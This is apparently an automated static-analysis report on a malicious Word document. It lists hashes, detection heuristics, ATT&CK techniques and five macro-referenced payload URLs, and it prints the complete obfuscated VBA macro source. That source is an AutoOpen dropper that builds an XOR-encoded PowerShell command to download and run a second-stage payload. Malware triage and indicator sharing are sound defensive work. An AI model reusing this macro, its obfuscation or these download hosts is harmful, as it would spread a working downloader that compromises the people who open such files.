Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b98f4b4880a4fb18…

MALICIOUS

Office (OLE)

231.5 KB Created: 2018-07-02 14:35:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 24a61cf500b4d70016a6e63cac3c8659 SHA-1: 732fd5fa57bf0b40ef6438aaf6f7dff87fe61ded SHA-256: b98f4b4880a4fb1836b88b9e4fea17080ca19f6fc00196469b5364fbc7a7879c
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a command via WScript.Shell, which is a common technique for downloading and executing additional malware. The specific command executed is obfuscated but clearly intended to run a payload. The presence of WScript.Shell and the AutoOpen macro strongly suggest a dropper or downloader functionality.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-6598986-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6598986-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
       mLvmi = (SVBhj + 93686 / (DvdpHu / zdkiQ))
lvECroMl = ijMYWwEmibW + CreateObject("Wscript.shell").Run(qBYJXFWFD + Chr(vbKeyP) + XDYuIXFn + Chr(vbKeyO) + CYEvAjDb + oIaDAmC, 885368173 - 885368173)
   VhuUk = (XwPlKO + 56315 / (jLaSs / mZFLv))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       mLvmi = (SVBhj + 93686 / (DvdpHu / zdkiQ))
lvECroMl = ijMYWwEmibW + CreateObject("Wscript.shell").Run(qBYJXFWFD + Chr(vbKeyP) + XDYuIXFn + Chr(vbKeyO) + CYEvAjDb + oIaDAmC, 885368173 - 885368173)
   VhuUk = (XwPlKO + 56315 / (jLaSs / mZFLv))
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URL
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "XzQIhXBmbIAqiL"
Sub AutoOpen()
On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://pulse.bg/6XK6I4Eim/ Referenced by macro
    • http://www.srm-india.in/2MTly1/Referenced by macro
    • http://www.langittour.com/IWNmtIfg/Referenced by macro
    • http://duhocductrang.edu.vn/PfnaLg/Referenced by macro
    • http://www.zoetstudio.com/E4MPAsxgdj/Referenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8659 bytes
SHA-256: f1f70361919fcc2bce139d87567ea6a12bd27ec7599ee2fe1b75371ba3e28d4a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
153 of 262 identifiers look randomly generated (e.g. 'XzQIhXBmbIAqiL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jSEcbdjk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XzQIhXBmbIAqiL"
Sub AutoOpen()
On Error Resume Next
   TTaQU = (AFScfJ + 54119 / (irzmP / XsjtT))
   bMzuEz = (AjKPWl + 25345 / (uBbwMD / fdAZbA))
   TuQqA = (DiqnG + 12765 / (zTDcVf / JVzMrM))
   UuiXnE = (XhaPv + 4699 / (dDPrca / BXZZj))
   kikoc = (ImdtJh + 43951 / (vuClG / pOAhQ))
   bnhwWR = (HXXjUb + 38708 / (ccACU / rEwHuh))
jHIwMd (zWYwswC + BAdqv + mavmVKEf)
   SOdWhD = (JcnUG + 77514 / (akoGz / zuXpO))
   bGNtDL = (RfsIA + 15158 / (NdjGfs / ujUZK))
   HUSWF = (HlXpwl + 75856 / (uAzKF / FOQHV))
End Sub
Function jHIwMd(CYEvAjDb)
On Error Resume Next
   WUhWs = (sBwaH + 4983 / (tQRuh / WXnwO))
   rmMFB = (MZilW + 89491 / (DPrGIw / iIuhm))
   EqXqo = (rbSwj + 70108 / (FXfhc / wEDTLR))
   BqWjsi = (tkAds + 5348 / (caCiK / NtcBS))
   nPJJaQ = (DTcwR + 79332 / (dBTuz / EsvYaC))
   mLvmi = (SVBhj + 93686 / (DvdpHu / zdkiQ))
lvECroMl = ijMYWwEmibW + CreateObject("Wscript.shell").Run(qBYJXFWFD + Chr(vbKeyP) + XDYuIXFn + Chr(vbKeyO) + CYEvAjDb + oIaDAmC, 885368173 - 885368173)
   VhuUk = (XwPlKO + 56315 / (jLaSs / mZFLv))
   pJLZGi = (TvYwjw + 85293 / (QHNWl / kJzFsj))
   GRINV = (FrDja + 51244 / (Wzhzb / sIjLZh))
End Function

Function zWYwswC()
On Error Resume Next
iuKMEU = pFjMw + aBofV - 84986 + OnRfYp - 96780 * zvjMPt - 72527 / wujJZ / 70447 - dtwtBc
   qXqpi = dfnOWo + Jwzhao - 94316 + kmjLdo - 77330 * cvwzaE - 22707 / ZLuaR / 14757 - mlupj
   qzvnJ = (42213 / osbkRC + 50578 / MRdvq) - 81033 / wHHnd / aEJFsN - dMWtib
vIBHjjFaJ = "wershe" + "ll  " + "        " + "     " + "   -JOiN" + " " + Chr(40) + " '14" + "k67C1" + "20>102" + "%23>68,7" + "9C93C7L" + "69>72" + "!64!79%"
wajwH = 84750 * cjUtw - (51504 - 28543 * GrlYzB - wikvQ)
   DTIHc = 36311 * DUEhB - (93774 - 81120 * VWGKOK - CkBjQ)
   OTNfhF = 71202 * dEDot - (20326 - 36600 * pPFlc - PtWZd)
WzHqw = "73>94C1" + "0D100m" + "79L94L4," + "125L" + "79%72m105" + "C70>67" + "m79>68!94" + "D17p14k"
YFwCc = 48814 * qUaqR - (49495 - 19285 * kCKRWP - ifFLCw)
   bYJdzm = 62111 * FaTVw - (69219 - 93910 * uzRYt - riYBsa)
   dFOMbG = 48106 * LmWHD - (86752 - 72740 * EWALXb - dlCwv)
HRBSWT = "68p91" + "D92C23D13" + "p66C94p9" + "4D90%" + "16>5p5>" + "90>95m7" + "0p89k79" + "p4C72p7" + "7D5," + "28,114m9" + "7%28"
iEwuFI = 17298 * wCrqv - (55394 - 12635 * tUhmH - Yjwsul)
   lvOAU = 4071 * bdwCna - (2275 - 96249 * FmtEqr - JGZwj)
   wRWTF = 87070 * jnaXD - (21460 - 93557 * wASvhV - NlYrs)
ZAHkSvHNI = "C99!" + "30k111p6" + "7!71%5" + "%106m6" + "6!94D94" + ">90C16!5" + "k5k93" + "k93%93k4," + "89p88p" + "71C7" + ",67k68" + "m78L"
rEtvDB = 24952 * moQUpq - (95586 - 28672 * Sjvah - IsSGGF)
   MrtRQ = 47512 * iWWikk - (81872 - 66041 * pjKcu - zRSJal)
   zMNXG = 22386 * dqaaX - (91146 - 32053 * fwjfZ - rGBjM)
KCzFSC = "67k75" + ",4,67k" + "68k5" + "k24m103%" + "126D70k8" + "3k27D5C" + "106m66k" + "94p9" + "4k90" + "p16C" + "5C5m93k93"
bwGwKb = 72957 * cJENJk - (34858 - 17531 * KMnpEc - mLXHX)
   wTzhz = 47870 * aIGJj - (70212 - 62243 * ZQwKOK - zpCXW)
   kuGaf = 55276 * bXaZS - (64335 - 91579 * MqznZ - dXwcLc)
DaLbW = "%93p4L70k" + "75>68!7" + "7>67p" + "94!94>6" + "9k95k88" + "%4m73"
cCaPJC = 60833 * RUILpL - (34020 - 48920 * PsLwD - ZwDdh)
   TfPDvI = 81631 * vtEwa - (4146 - 53059 * BFPfj - QbzjYd)
   LwEiES = 22292 * NbktoK - (4336 - 12349 * GUwTNv - wJwjUK)
lPlQukTjT = "p69D71%5" + "k99D125p" + "100p71" + "C94m" + "99p76>" + "77D5>" + "106L66p9" + "4C94" + "m90L" + "16,5p"
zWYwswC = vIBHjjFaJ + WzHqw + HRBSWT + ZAHkSvHNI + KCzFSC + DaLbW + lPlQukTjT
   MjNNi = 77065 * zqDmRt - (24439 - 24748 * Yttnl - XilUH)
   wZdaF = 7543 * TNwaiJ - (25962 - 58956 * LzDlAz - bVASzL)
   QFZwk = 96579 * tItCbL - (9109 - 43667 * NVBwPw - NBLVPn)
End Function
Function BAdqv()
On Error Resume Next
FljHf = 43890 * BpKNW - (99432 - 73078 * FGHMH - WuOkP)
   uKIEfY = 14995 * DwmKD - (7422 - 17632 * NWETCB - ErZut)
   bKjTCR = 51576 * Lpftq - (50190 - 37778 * dYjaT - QVKwmB)
DMERwEa = "5L78m9" + "5!66k69>" + "73,78k" + "95k73>9" + "4L88%7" + "5p68L77!" + "4!79,78k9" + "5>4L92L" + "68%5>122m" + "76L68,7" + "5%102m77" + "m5L106,66"
iOXMb = 30170 * TiSGHo - (13497 - 52685 * qHjuP - rAKdqT)
   cwctbS = 57082 * wiFBp - (40943 - 67714 * YCZUOC - VSqnWW)
   rVWPjV = 82164 * GhzrfL - (17790 - 39814 * JDBijr - wltuEM)
JvQAiXbFrPR = "k94m94%90" + "m16>5k" + "5!93%93" + "D93m" + "4,80>69,7" + "9,94m89%9" + "4p95p7" + "8%67D69L"
liHmzk = 60302 * UPMwLp - (71745 - 44405 * KOqZQ - NwPVJ)
   mjOVlb = 17946 * bunwSF - (11631 - 92138 * alfbh - tRCVM)
   zZbVG = 43113 * NMozNr - (47855 - 58342 * aVIYmb - wjZIH)
zzjcNiTbYPC = "4C73L" + "69D71" + "p5%111L3" + "0L103k1" + "22!107C" + "89D82C" + "77>78m64C" + "5k13%4L12" + "1k90m70L"
FzwnMY = 55297 * XXzzA - (43817 - 6252 * IwSZwL - cQsisw)
   RiYqJi = 69533 * DBPlmp - (39494 - 51720 * NaFwTB - mtzUXT)
   ohPWzh = 67300 * cZObjZ - (31498 - 51640 * GKMRYo - dAERUE)
pMTOtoKIkzw = "67k9" + "4p2C1" + "3D106L13" + "m3%17%1" + "4C127m" + "108C6" + "5m10D2" + "3!10D13"
PhPOj = 14513 * MrjBBd - (621 - 4385 * aYkVaU - MiOdSh)
   HqjFz = 82672 * GLJfwh - (50299 - 11242 * bQPvGZ - XdvtCj)
   kYuFSZ = 19578 * YKVuQ - (19475 - 22063 * KHpFQ - qhwcs)
HhzaqGTzUw = "!29p27>" + "28>13L" + "17m1" + "4p68>92!" + "80p23%14" + ",79!68C" + "92>16L94k" + "79,71C9"
bBwsa = 81440 * TTDzuR - (7295 - 26470 * wmMQh - Jjvlh)
   ItXvM = 23457 * AOHtWw - (42873 - 16752 * PMdjzz - UUibas)
   dLfic = 22036 * XCLzT - (25098 - 53081 * cmNHvm - DlGhw)
hXBwIqdP = "0L1L13>11" + "8p13C1k1" + "4k12" + "7,108k" + "65C1C1" + "3m4D7" + "9p82k79k1"
ikVIwK = 10681 * hLjCN - (60321 - 45192 * mJAbiO - hQzOf)
   wBVcc = 5273 * mErin - (53540 - 73136 * JYDDlX - zDcwQT)
   zoIOL = 49402 * ChFHMp - (78425 - 86020 * TLsbRi - wRJED)
khnpO = "3L17m76" + ">69p8" + "8%79" + "m75m" + "73p6" + "6C2>14%1" + "23p65m120" + "%10%" + "67p68m10" + "m14C68D91"
zfmCw = 23312 * iNXBqw - (96332 - 36205 * iiwiho - nCQzDk)
   STHvaF = 80959 * qWYna - (60572 - 52509 * buckLD - TkLmw)
   rwvZEk = 17942 * alcCo - (66266 - 34061 * oCcRX - vLumRC)
LhTqRcfaiss = ",92D3L81L" + "94p88p83" + "k81>1" + "4D67" + "%120m" + "102D4!1" + "10m6" + "9%93" + "k68p70" + "D69,75"
SrAIJ = 68965 * sbtraW - (28249 - 99461 * LvKqwY - YtHNzP)
   kvqIut = 66191 * QZEVmT - (69958 - 27551 * MApDCc - QuFcO)
   iMpwiE = 65583 * AXNkis - (50468 - 17657 * NNMboF - ASPznK)
MdkjBpbpXcl = ",78C108" + "%67C7" + "0p79" + "p2!14C1" + "23L65%1" + "20m6>10L" + "14,6" + "8L92C80>"
oGVND = 25734 * BKpiUt - (88856 - 90493 * YqhoIm - jdVuCA)
   bNWSSo = 11217 * iYjkI - (97301 - 1788 * HCiIJ - pDsCRl)
   WrclI = 91040 * OTGubi - (72121 - 73252 * lSnfYA - ZlhTWr)
SiijUN = "3k17,12" + "1>94>75,8" + "8,94!7" + ",122,8" + "8m69k73L" + "79,89%" + "89p1" + "0!14L" + "68D92" + "p80k1" + "7>72%8" + "8k79!75D6"
QXTjAF = 86100 * ZlkGha - (47057 - 73483 * UjwUY - DKTbTJ)
   OsiAL = 67348 * aHDMo - (8729 - 9233 * SjQzFP - rUFrwQ)
   hTqBjN = 32518 * abGWHI - (17033 - 9255 * dqiZN - XrRzYT)
jjWdQz = "5,17%87" + "!73k75" + "!94,7" + "3!66p81>8" + "7C87'.SpL" + "it" + Chr(40) + " '>!%p" + ",LDmCk'" + Chr(41) + "|FoREA" + "cH { [c" + "HAr] "
BAdqv = DMERwEa + JvQAiXbFrPR + zzjcNiTbYPC + pMTOtoKIkzw + HhzaqGTzUw + hXBwIqdP + khnpO + LhTqRcfaiss + MdkjBpbpXcl + SiijUN + jjWdQz
   uTmmF = 51569 * mPzhH - (81657 - 97651 * JVnSO - ZXZLdt)
   FUDoq = 34750 * vCwVlE - (438 - 32070 * ozBpJ - jPQmc)
   jiZZG = 44690 * chPpjb - (24028 - 56020 * fTWEsn - TEDjA)
End Function
Function mavmVKEf()
On Error Resume Next
loXEpS = 99072 * VtDzTW - (55176 - 91134 * ddEDKz - buLucN)
   dwlJF = 42086 * itGRC - (46017 - 55636 * OnYpj - aEsbqn)
   vNbch = 11733 * uttQYL - (11043 - 13616 * RjKhJ - kNbEJ)
JqEWmWH = Chr(40) + " $_" + "-bXor " + "0x2A  " + Chr(41) + " }" + Chr(41) + " |& " + Chr(40) + " " + Chr(40) + "[" + "STRin" + "G]$ve" + "RBoSe" + "PReFERe" + "ncE" + Chr(41) + "[1," + "3]" + Chr(43) + "'x" + "'-JOiN''"
siOijm = 73529 * DuiCL - (60620 - 50466 * QMCqH - TQjOP)
   jbcqXI = 80520 * IrkIzw - (64915 - 24928 * ECAwUW - AMlmO)
   vHFNIs = 50282 * iMXZU - (90472 - 69185 * lHZGOj - VmjCD)
AtNRPE = Chr(41) + ""
mavmVKEf = JqEWmWH + AtNRPE
   XDQLq = 28932 * ufEuFY - (99838 - 21279 * bzsFT - NHbYKI)
   BXKwU = 59752 * fhiMJw - (59017 - 38371 * QELDi - HPkrwq)
   BVXDRc = 35204 * fCpvsY - (53525 - 89614 * KYGWcL - kPEIq)
End Function


Attribute VB_Name = "PvbjYnsNl"

Open this report in the interactive analyzer, or submit your own file for analysis.